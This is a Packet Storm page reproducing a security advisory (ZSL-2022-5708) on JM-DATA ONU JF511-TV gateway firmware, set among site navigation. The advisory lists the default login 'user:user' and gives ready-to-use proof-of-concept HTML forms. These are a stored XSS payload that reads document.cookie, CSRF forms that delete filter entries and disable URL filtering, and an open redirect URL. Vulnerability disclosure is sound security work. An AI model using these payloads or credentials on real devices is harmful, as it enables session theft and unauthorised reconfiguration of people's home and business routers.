WHAT ARE YOU LOOKING FOR?

Popular Tags

JM-DATA ONU JF511-TV 1.0.67 / 1.0.62 / 1.0.55 XSS / CSRF / Open Redirect ≈ Packet Storm

Exploits Affichages : 461
JM-DATA ONU JF511-TV 1.0.67 / 1.0.62 / 1.0.55 XSS / CSRF / Open Redirect ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

JM-DATA ONU JF511-TV 1.0.67 / 1.0.62 / 1.0.55 XSS / CSRF / Open Redirect[6]
Authored by Neurogenesia[7] | Site zeroscience.mk[8]

JM-DATA ONU JF511-TV versions 1.0.67, 1.0.62, and 1.0.55 suffer from cross site request forgery, persistent cross site scripting, default credential, and open redirection vulnerabilities.

SHA-256 | c51066c0cb9048b02b75497475a4a15013a17f7c6f79b27527c10c72ae1fc0c9
Download[9] | Favorite[10] | View[11]

Change Mirror[12] Download[13]

        
JM-DATA ONU JF511-TV Multiple Remote Vulnerabilities
Vendor: JM-DATA GmbH
Product web page: https://www.jm-data.at
Affected version: 1.0.67
1.0.62
1.0.55
Summary: This ONU is the perfect GEPON home and business gateway.
It is an all-rounder in perfection. It can BRIDGE/NAT/RIP ROUTEND
and COMBINED.
Desc: The device suffers from multiple vulnerabilities including:
Default Credentials, CSRF, Authenticated Stored XSS and Open Redirect.
Tested on: Boa/0.93.15
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2022-5708
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5708.php
24.04.2022
--
Default credentials:
--------------------
user:user
Stored XSS / HTML Injection:
----------------------------
<html>
<body>
<form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input type="hidden" name="url" value="'><script>alert(document.cookie)</script>' />
<input type="hidden" name="action" value="ad" />
<input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />
<input type="submit" value="Go" />
</form>
</body>
</html>
CSRF (delete IP entry filter):
------------------------------
<html>
<body>
<form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input type="hidden" name="bcdata" value="ld3:idxi0eee" />
<input type="hidden" name="action" value="rm" />
<input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />
<input type="submit" value="Go" />
</form>
<form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input type="hidden" name="urlfilterEnble" value="off" />
<input type="hidden" name="action" value="rm" />
<input type="hidden" name="bcdata" value="ld3:idxi0eed3:idxi1eee" />
<input type="hidden" name="submit-url" value="https://192.168.1.2:8443/secu_urlfilter_cfg_en.asp" />
<input type="submit" value="Go" />
</form>
</body>
</html>
Open Redirect:
--------------
https://192.168.1.2:8443/boaform/formWirelessTbl?submit-url=https://zeroscience.mk
common.js:
----------
/*
* isCharUnsafe - test a character whether is unsafe
* @c: character to test
*/
function isCharUnsafe(c)
{
var unsafeString = "\"\\`\+\,='\t";
return unsafeString.indexOf(c) != -1
|| c.charCodeAt(0) <= 32
|| c.charCodeAt(0) >= 123;
}
/*
* isIncludeInvalidChar - test a string whether includes invalid characters
* @s: string to test
*/
function isIncludeInvalidChar(s)
{
var i;
for (i = 0; i < s.length; i++) {
if (isCharUnsafe(s.charAt(i)) == true)
return true;
}
return false;
}

Login[14] or Register[15] to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month[108]
News Tags[109]
Files by Month[110]
File Tags[111]
File Directory[112]
About Us
History & Purpose[113]
Contact Information[114]
Terms of Service[115]
Privacy Statement[116]
Copyright Information[117]
Hosting By
Rokasec[118]
close
Image
Back To Top

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"

Category

Popular Sections

About